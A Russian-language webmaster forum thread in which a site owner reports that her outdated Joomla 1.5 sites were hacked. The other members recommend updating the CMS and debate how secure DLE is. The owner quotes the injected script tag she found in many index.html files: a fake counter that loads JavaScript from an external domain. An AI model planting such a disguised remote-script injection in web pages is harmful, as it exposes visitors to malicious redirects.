какой-то вирус на joomla

12
K
На сайте с 30.11.2013
Offline
0
984

Здравствуйте, уважаемые))

Недавно Яндекс поставил мой сайт в разряд подозрительных, обнаружив в нем редирект..при этом никто кроме Яндекса ничего не видел и не обнаруживал..я все проверяла, на многих онлайн ресурсах, айболитом и другими антивирусниками в том числе. потом как-то раз случайно зашла в файл index.html и ужаснулась-там были ссылки скриптом написанные.. причем они были повсюду во всех index.html, во всех почти папках. Я вручную все поудаляла, практически полный ноль в кодах и теперь не знаю где может скрываться взломщик, и ведь все повторится сначала, увы, это я понимаю..

скрипт, который выводился вот: <script id="top100Counter" type="text/javascript" src="hhttp://idiri.ru/tmp/js.js"></script>"

может у кого-то были подобные случаи? поделитесь, прошу! хотелось бы решить проблему глобально.

K5
На сайте с 21.07.2010
Offline
209
#1

версия joomla?

покажите пациента.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
K
На сайте с 30.11.2013
Offline
0
#2

версия старая 1,5-23...

показывать стесняюсь, он не очень красивый, может подскажите - как во все индекс файлы проставляются ссылки? мне кажется, что тут червь какой-то от сервера скорее заполз, потому что все поражены и другие мои сайты одинаково, но их яша не определяет как вредные почему-то..

demon2005
На сайте с 06.02.2010
Offline
173
#3

kavins, эту версию лучше до 2,5 обновить, на всех сайтах

Машины должны работать. Люди должны думать. (Девиз компании "IBM") Хостинг ( http://goo.gl/em6I5 ), рекомендую. Код на скидку 965VI5O60E Выгодно купить/продать сайт ( http://www.telderi.ru/?pid=c0fb22 )
K
На сайте с 30.11.2013
Offline
0
#4

да я сайты в основном там для себя сделала, не очень понимаю как с шаблонами быть для 2,5 версии,увы( давно бы обновилась, один сайт на 2,5 у меня-там такого пока что нет

draff
На сайте с 30.03.2010
Offline
65
#5

kavins,

Ну сразу можно обновить и до 1.5.26

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
K5
На сайте с 21.07.2010
Offline
209
#6

ваш червь называется шелл-скрипт

да и 1.5.26 последняя в ветке, обновление желательно

K
На сайте с 30.11.2013
Offline
0
#7

да обновлюсь обязательно, как-то особо не заморачивалась, года два практически назад их делала, обновилась до 23 версии и забыла)) пока вот не взломали..все было спокойно и нормально🍿

[Удален]
#8
kavins:
да обновлюсь обязательно, как-то особо не заморачивалась, года два практически назад их делала, обновилась до 23 версии и забыла)) пока вот не взломали..все было спокойно и нормально🍿

Версии движков обновляют не для того, чтоб лишний раз порадовать пользователей, а преимущественно для того, чтоб залатать дыры, чтоб уменьшить вероятность взлома.

Потому не ленитесь предохраняться заранее и следите за актуальными обновлениями Joomla :)

Сам использую для сайтов версию 2.5 с последним ее апдейтом и пока еще ни разу не ломали.

S0
На сайте с 18.07.2011
Offline
35
#9

Пользуйтесь лиц. DLE, практически непробиваема перед шеллами. А версия джомлы роли не играет, все равно много уязвимостей

lalartu
На сайте с 13.02.2013
Offline
55
#10
Sandro079:
Пользуйтесь лиц. DLE, практически непробиваема перед шеллами. А версия джомлы роли не играет, все равно много уязвимостей

Да неужели так непробиваема?

Видно, что 50% из топ-10000 заражённых сайтов используют систему DLE, а популярные сайты из топ-10000 либо отказались от неё, либо успешно её маскируют, чтобы избежать атаки.

источник http://safesearch.ya.ru/replies.xml?item_no=120

Давай ещё что-нибудь смешное напиши раз уж начал.

Тссс, парень, Яндекс.Бар не нужен?
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий